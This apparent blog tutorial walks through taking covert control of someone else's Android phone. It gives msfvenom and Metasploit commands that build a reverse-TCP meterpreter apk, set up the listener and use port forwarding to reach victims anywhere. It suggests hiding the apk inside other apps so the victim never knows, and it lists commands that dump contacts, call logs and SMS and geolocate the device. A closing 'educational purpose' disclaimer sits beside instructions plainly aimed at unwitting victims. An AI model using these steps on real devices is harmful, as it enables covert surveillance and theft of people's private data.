Android is leading the competition among mobile operating systems. By the vast usage of smartphones, android has spread all over the world with its tons of features. But let’s have a look on how easy it is to get control on an android device which may or may not belong to us and may be present at any part of the world.
Click here to setup a KALI environment.
Once you setup KALI on your mac or windows, run KALI Linux and follow these steps
(Note: We will be using metasploit in this tutorial which is be preinstalled in KALI)
- Open up the Terminal and type following command “msfvenom -p android/meterpreter/reverse_tcp LHOST=”Your Local IP” R > root/clue.apk” (Use “ifconfig” command to know your IP Address)
- You will find a clue.apk file in root directory, copy that file and install it into victims device. There are methods to inject this apk with other applications so that victim will never get to know about attack(Methods will be updated soon on this page).
- Now, open up new terminal window and begin msfconsole, type “msfconsole” in your terminal.
- Once the console is ready, you can begin your hacks. type “use exploit/multi/handler” to start up your msf handler and than type “set payload android/meterpreter/reverse_tcp” to set up payload. Type “set host (Your IP Address) ” without braces to set your IP. Have a look at this picture
- You are all set. Rub your hands and type “exploit” to start payload handler, grab a popcorn and wait for victim to tap on the installed application. Boom!!! You can now control victim android device without letting him know.
Note: Victim must be on the same wireless network for this to work. You have to follow port forwarding and change local IP to Public IP to make this work on a victim living at any part of the world.
You can just type “help” to get to know about all set of commands you can use.
Here are some commands that you can use to control the device:
check_root – Check if device is rooted
dump_calllog – Get call log
dump_contacts – Get contacts list
dump_sms – Get sms messages
geolocate – Get current lat-long using geolocation
*Do not attempt any kind of malicious activities, the information provided is just for educational purpose.
If you are stuck at any point feel free to comment us below.
Follow our Facebook page to get more advanced Ethical hacking updates.